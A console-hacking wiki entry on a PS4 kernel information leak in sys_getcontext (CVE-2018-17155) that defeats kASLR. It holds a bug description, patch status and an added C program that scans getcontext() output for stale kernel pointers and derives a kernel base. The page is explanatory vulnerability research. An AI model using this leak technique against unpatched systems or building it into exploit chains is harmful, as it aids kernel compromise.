Editing Vulnerabilities
=== FW <= 6.00 ?6.02? - sys_getcontext Information Leak (kASLR defeat) (CVE-2018-17155) ===
==== Analysis ====
* https://www.cvedetails.com/cve/CVE-2018-17155/
* coming soon by CelesteBlue
==== Bug Description ====
System call 421, sys_getcontext(), fills the ucontext_t pointed to by ucp with the currently active context. The kernel builds that structure in a local stack variable and then copies the whole structure out to userland, but some of its fields are never written before the copyout, so those bytes return whatever stale kernel stack data occupied them. Because that stale data can include kernel pointers (return addresses, frame pointers, data pointers), a userland process can compute the kernel's randomized base from the leaked values, which defeats kASLR. The same bug was fixed upstream in FreeBSD as CVE-2018-17155. On PS4 the vector was patched in FW 6.20: the structure is now zeroed with bzero() before it is used, so the unwritten fields are copied out as zeros instead of stale kernel memory.
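As an added example, not code from this wiki page nor from QuickHEN or KitHEN, the check a practitioner would run for this class of bug, in C: pre-fill a ucontext_t with a marker byte, let the kernel populate it, then scan the result for 8-byte slots that look like kernel pointers, and turn one such pointer into the kernel base. Assumptions (all hypothetical, labelled in the comments): FreeBSD-style amd64 kernel addressing with kernel text at or above 0xffffffff80000000, a constructed sample leak buffer, and a placeholder known offset for the base computation, which in practice must be taken from a kernel dump of the exact FW. On Linux getcontext() is a libc routine, so there the program only exercises the scanner; on FreeBSD (and on PS4, where homebrew normally issues syscall 421 through its own stub) the same call reaches the kernel path described above.

```c
/* Added example: probing getcontext() for stale kernel data and scanning the
 * returned ucontext_t for kernel pointers. Not code from the wiki page.
 * Assumptions: amd64 FreeBSD-style addressing (kernel text >= 0xffffffff80000000),
 * and a placeholder known offset for the base computation. */
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stddef.h>
#include <ucontext.h>

#define KERNEL_TEXT_MIN 0xffffffff80000000ULL   /* assumption: FreeBSD amd64 kernel map */

/* A slot looks like a kernel pointer if it is in the high canonical half at or
 * above the kernel text base. Userland pointers (0x00007fff...), small register
 * values, the 0x41 marker and an all-ones register never match. */
int is_kernel_pointer(uint64_t v)
{
    return v >= KERNEL_TEXT_MIN && v != 0xffffffffffffffffULL;
}

/* Walk a buffer 8 bytes at a time (memcpy keeps it alignment-safe) and count
 * slots holding kernel-looking pointers; the offset of the first hit, if any,
 * is stored through first_off. Returns the hit count. */
size_t scan_kernel_pointers(const uint8_t *buf, size_t len, size_t *first_off)
{
    size_t hits = 0;
    for (size_t off = 0; off + 8 <= len; off += 8) {
        uint64_t v;
        memcpy(&v, buf + off, sizeof v);
        if (is_kernel_pointer(v)) {
            if (hits == 0 && first_off)
                *first_off = off;
            hits++;
        }
    }
    return hits;
}

/* Fill a ucontext_t with a marker, ask the kernel to populate it, copy the raw
 * bytes to out (if given) and report how many 8-byte slots look like kernel
 * pointers. A vulnerable kernel copies its partially initialized stack copy of
 * the structure out wholesale, so stale kernel pointers land in the unwritten
 * fields; a fixed kernel zeroes the structure first and no slot matches. */
size_t probe_getcontext(uint8_t *out, size_t out_len, size_t *first_off)
{
    ucontext_t uc;
    memset(&uc, 0x41, sizeof uc);        /* marker: 0x4141414141414141 is never a hit */
    if (getcontext(&uc) != 0)
        return 0;
    if (out) {
        size_t n = sizeof uc < out_len ? sizeof uc : out_len;
        memcpy(out, &uc, n);
    }
    return scan_kernel_pointers((const uint8_t *)&uc, sizeof uc, first_off);
}

/* Kernel base from a leaked pointer. known_offset is the offset of the pointed-to
 * code/data inside the kernel image for the exact FW (FW-specific, taken from a
 * dump); the caller supplies it, no real value is assumed here. */
uint64_t kernel_base_from_leak(uint64_t leaked, uint64_t known_offset)
{
    return leaked - known_offset;
}

/* Constructed sample (synthetic, not captured from any console): a 48-byte
 * fragment of a "leaked" ucontext_t where most slots are the marker or a
 * userland register value and the slot at offset 24 holds a kernel-looking
 * pointer. Returns the hit count; the first hit offset goes to first_off. */
size_t demo_constructed_leak(size_t *first_off)
{
    uint8_t buf[48];
    memset(buf, 0x41, sizeof buf);                 /* fields the kernel did write with the marker */
    uint64_t user_rip = 0x0000000000401230ULL;     /* a userland value: not a hit */
    uint64_t stale    = 0xffffffff82345678ULL;     /* constructed stale kernel pointer */
    memcpy(buf + 8, &user_rip, sizeof user_rip);
    memcpy(buf + 24, &stale, sizeof stale);
    return scan_kernel_pointers(buf, sizeof buf, first_off);
}

/* Offset of the first hit in the constructed sample (24 by construction). */
size_t demo_constructed_leak_offset(void)
{
    size_t off = 0;
    demo_constructed_leak(&off);
    return off;
}

int main(void)
{
    uint8_t raw[sizeof(ucontext_t)];
    size_t off = 0;
    size_t hits = probe_getcontext(raw, sizeof raw, &off);
    printf("ucontext_t is %zu bytes; %zu slot(s) look like kernel pointers\n",
           sizeof(ucontext_t), hits);
    if (hits) {
        uint64_t v;
        memcpy(&v, raw + off, sizeof v);
        printf("first candidate at offset %zu: 0x%016llx\n", off, (unsigned long long)v);
    }
    return 0;
}
```

The scan does not compare against the marker: a vulnerable kernel overwrites the whole buffer on copyout, so the marker only serves to make the output unambiguous. What distinguishes a leak from a normal result is the address range of the recovered values, which is why the filter is a kernel-range check rather than a "bytes unchanged" check.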
==== Exploit Implementation ====
* QuickHEN by CelesteBlue (v2 not released yet)
* KitHEN by CelesteBlue (not released yet)
==== Patched ====
'''Yes''', in FW 6.20 at the latest; whether 6.02 is still vulnerable is unconfirmed, hence the ?6.02? in the section title.
----